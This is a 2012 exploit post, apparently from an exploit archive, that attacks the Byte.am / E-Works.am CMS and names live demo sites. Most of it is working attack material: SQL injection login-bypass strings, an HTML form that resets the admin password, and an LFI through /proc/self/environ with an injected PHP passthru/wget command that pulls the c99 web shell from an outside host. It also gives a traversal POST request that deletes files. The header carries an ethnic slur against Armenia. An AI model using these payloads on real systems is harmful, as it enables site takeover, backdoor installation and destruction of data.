Home / exploits Byte.am / E-Works.am CMS SQL Injection / LFI / Shell Upload
Posted on 21 August 2012
[+]-------------------------------------------------------------[+] Azerbaijan Black Hatz Presentzz 0day for bitch Armenia [-]-------------------------------------------------------------[-] Exploit title:Byte.am and e-works.am CMS MULTIPLE VULNERABLITIES Date:18 August 2012 Author: Worm Man Software Vendor:e-works.am && byte.am Category:Web Site admin panel:admin/admin.php Dork:No dork (See sites portofolio) Tested on:democms.byte.am Demos: democms.byte.am dhgroup.am coalition.byte.am +++++++++++++++++++++++++++++++ Respect to all bro :Z my first exploit :) Let'z Start ... [+].............................................................[+] Blind sql injection... Vulnerable code section on login.php ------------------------------------------------------------------------------------------ $query = "SELECT * FROM pass WHERE username = '$username' AND password = '$password'"; $result = mysql_query($query) or die(mysql_error()); $num_rows = mysql_num_rows($result); ------------------------------------------------------------------------------------------ Write for login:' or sleep(20)-- and 2='2 Write for password:anything When submit this code execute in sql SELECT * FROM pass WHERE username = '' or sleep(2)-- and 2='2' AND password = 'f0e166dc34d14d6c228ffac576c9a43c' Wait... True [-].............................................................[-] [+].............................................................[+] CRLF add admin with the help of sql :D Vulnerable code login.php all -------------------------------------------------------------------------------------------- <? function updatePassword ($newusername, $newpsw, $email) { $password = md5($newpsw); $query = "UPDATE pass SET username = '$newusername', password = '$password', email='$email' WHERE id = '1'"; $k = mysql_query($query); }; require_once ('../include_files/config.php'); $username = $_POST['username']; $password = md5($_POST['psw']); $query = "SELECT * FROM pass WHERE username = '$username' AND password = '$password'"; echo $query; $result = mysql_query($query) or die(mysql_error()); $num_rows = mysql_num_rows($result); if ($num_rows == 1) { $_SESSION['LOGIN'] = md5($username.substr($password, 1, 3)); if (isset($_POST[newusername]) && isset($_POST[newpsw]) && isset($_POST[newpsw1]) && $_POST[newusername] != "" && $_POST[newpsw] != "" && $_POST[newpsw1] != "") { if ($_POST[newpsw] == $_POST[newpsw1]) { updatePassword($_POST[newusername], $_POST[newpsw], $_POST[email]); header("Location: admin.php"); exit(); } else { header("Location: chengepasw.php"); exit(); }; }; header("Location: main.php"); exit(); } else { header("Location: admin.php?err=1"); } ?> -------------------------------------------------------------------------------------------- The script check username and pass from sql.But it has blind sql.We can bypass it eazily :D And script get + result.$num_rows will == 1 so we change admin information Here is the html code for CRLF -------------------------------------------------------------------------------------------- <html> <body> <form name="form1" onSubmit="return check()" method="post" action="http://>>Site Name<</admin/login.php?lg=1" > <table width="400" border="0" align="center" cellpadding="0" cellspacing="20" style="font-size:12px"> <tr> <td colspan="2" align="right" class="colors"><div align="center" class="style1" ><strong style="font-size:18px">Admin page</strong></div></td> </tr> <tr> <td align="right">E-mail</td> <td width="188"><input class="form_1" type="text" name="email" style="width:180px;" value="your_email@email.com"></td> </tr> <tr> <td align="right">Old username</td> <td width="188"><input class="form_1" type="text" name="username" style="width:180px;" value="' or 0=0-- or 1='1"></td> </tr> <tr> <td align="right">Old password(something)</td> <td><input class="form_1" type="text" name="psw" style="width:180px;" value="anything" ></td> </tr> <tr> <td align="right">New username</td> <td width="188" ><input class="form_1" type="text" name="newusername" style="width:180px;"></td> </tr> <tr> <td align="right">New password</td> <td ><input class="form_1" type="password" name="newpsw1" style="width:180px;"></td> </tr> <tr> <td align="right">Confirm password</td> <td ><input class="form_1" type="password" name="newpsw" style="width:180px;"></td> </tr> <tr> <td align="center" colspan="2"><input type="submit" name="Submit" value="Enter" class="button"></td> </tr> </table> </form> </body> </html> -------------------------------------------------------------------------------------------- [-].............................................................[-] [+].............................................................[+] And Shell upload via LFI Directory Traversal Vulnerable code section in the end of main.php You can upload your shell if you are admin.And you know how to be admin :D -------------------------------------------------------------------------------------------- <? require_once ("header.php"); if (isset($page) && $page != "") {require_once("page_inc/".$page.".php");} require_once ("futer.php"); ?> -------------------------------------------------------------------------------------------- http://>>Site_Name/admin/main.php?lg=1&page=lg=1&page=/../../%2E%2E/../../proc/fd/../s%65lf/%65nviron/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././. Bypassing... And change your accept-encoding to "<? passthru('wget http://c99.gen.tr/c99.txt -O yeah.php') ?>" [-].............................................................[-] [+].............................................................[+] You can view and delete files via Assets Manager Only File are seen... See headerz Post content ---------------------------------------------------------------------------------------------- POST http://>>Site_Name<</admin/editor/assetmanager/assetmanager.php?ffilter= Host: >>Site_Name<< User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:14.0) Gecko/20100101 Firefox/14.0.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip, deflate Connection: keep-alive Referer: http://>>Site_Name<</admin/editor/assetmanager/assetmanager.php?ffilter= Cookie: dhtmlgoodies_expandedNodes=%2C0%2C; 458c09681ca533240f6a21e2a95219af=1debe8eaf8e894c869be03fdee73feee; act=main.php; f=N%3B; c=Site Path; __utma=153729195.1535137779.1343289719.1344546638.1344608883.14; __utmz=153729195.1343289719.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __unam=d0b81f2-138c24e7922-5c060fe6-39; PHPSESSID=bd8f8fffa71ab97a63ff5dd05df3e022 Content-Type: application/x-www-form-urlencoded Content-Length: 62 ---------------------------------------------------------------------------------------------- Send Post inpFileToDelete=&inpCurrFolder=../../../ You will be in public_html Write to "inpFileToDelete" file path for deleting files +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ Respect all hatz Respect all bro,z Respect all Azerbaijan hackers +++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++ / | | ----|---- -- / |---| | /| |----- | | -- / / | | | || / |---| | / | |_____ | | | / /---- | | | || /---- | | / | | | | | /---- / | | | || / | | / | |----- | | |/ Team...
